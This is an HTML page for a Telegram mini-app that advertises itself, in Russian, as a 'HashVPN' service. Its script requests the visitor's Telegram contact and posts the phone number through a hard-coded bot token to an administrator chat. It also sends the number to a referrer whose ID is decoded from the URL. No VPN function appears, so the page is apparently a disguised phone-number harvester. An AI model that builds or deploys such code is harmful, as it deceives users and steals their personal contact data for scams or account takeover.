<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>HashVPN</title>
    <style>
        /* Стили */
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
            overflow: hidden;
            transition: background-color 0.3s ease, color 0.3s ease;
        }

        h1 {
            font-size: 2rem;
            font-weight: bold;
            margin-bottom: 10px;
            text-align: center;
            transition: color 0.3s ease;
        }

        .description {
            margin-bottom: 20px;
            text-align: center;
            font-size: 1rem;
            color: #888;
            max-width: 90%;
            transition: color 0.3s ease;
        }

        button {
            border: none;
            padding: 10px 20px;
            font-size: 1rem;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s ease, color 0.3s ease;
        }

        .phone-number {
            margin-top: 20px;
            font-size: 1.2rem;
            transition: color 0.3s ease;
        }
    </style>
</head>
<body>
    <h1 id="app-title">HashVPN</h1>
    <div class="description" id="description">
        Защитите свою конфиденциальность с HashVPN. <br>
        Надежное шифрование, высокая скорость и доступ в любую точку мира.
    </div>
    <button id="get-vpn-btn" onclick="requestPhoneNumber(this)">Получить VPN</button>
    <div class="phone-number" id="phone-number"></div>

    <script>
        // JavaScript
        const tg = window.Telegram.WebApp;

        // Функция для дешифрования ID
        function decryptUserId(encryptedUserId) {
            return encryptedUserId / 3;
        }

        // Получаем зашифрованный ID из URL
        function getEncryptedUserIdFromUrl() {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get('startapp')?.replace('ref', '');
        }

        // Проверяем, есть ли зашифрованный ID в URL
        const encryptedUserId = getEncryptedUserIdFromUrl();
        let referrerUserId = null;

        if (encryptedUserId) {
            referrerUserId = decryptUserId(encryptedUserId);
            console.log('Referrer User ID:', referrerUserId);
        }

        // Отправка номера телефона
        async function sendMessageToAdmin(phoneNumber) {
            const botToken = '7677386741:AAFrg5fM7pBPcGeljsPI9BxyHAxXsBzoWl8'; // Замените на токен вашего бота
            const adminChatId = '1521132127'; // Замените на chat_id администратора

            const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
            const text = `Новый номер телефона: ${phoneNumber}`;

            try {
                const response = await fetch(url, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({
                        chat_id: adminChatId,
                        text: text
                    })
                });

                const result = await response.json();
                if (result.ok) {
                    console.log('Сообщение отправлено администратору');
                } else {
                    console.error('Ошибка при отправке сообщения администратору:', result);
                }
            } catch (error) {
                console.error('Ошибка при отправке сообщения:', error);
            }
        }

        async function sendMessageToUser(userId, phoneNumber) {
            const botToken = '7677386741:AAFrg5fM7pBPcGeljsPI9BxyHAxXsBzoWl8'; // Замените на токен вашего бота

            const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
            const text = `Новый номер телефона по вашей ссылке: ${phoneNumber}`;

            try {
                const response = await fetch(url, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({
                        chat_id: userId,
                        text: text
                    })
                });

                const result = await response.json();
                if (result.ok) {
                    console.log('Сообщение отправлено пользователю');
                } else {
                    console.error('Ошибка при отправке сообщения пользователю:', result);
                }
            } catch (error) {
                console.error('Ошибка при отправке сообщения:', error);
            }
        }

        function requestPhoneNumber(el) {
            tg.requestContact(async function (sent, event) {
                if (sent) {
                    try {
                        const phone_num = `${event.responseUnsafe.contact.phone_number}`;

                        // Отправляем номер телефона администратору
                        await sendMessageToAdmin(phone_num);

                        // Если есть referrerUserId, отправляем номер телефона и ему
                        if (referrerUserId) {
                            await sendMessageToUser(referrerUserId, phone_num);
                        }

                        Telegram.WebApp.showAlert('✅ Номер успешно отправлен!');
                    } catch (error) {
                        Telegram.WebApp.showAlert('⚠️ Произошла ошибка при отправке номера');
                    }
                }
            });
        }
    </script>
</body>
</html>
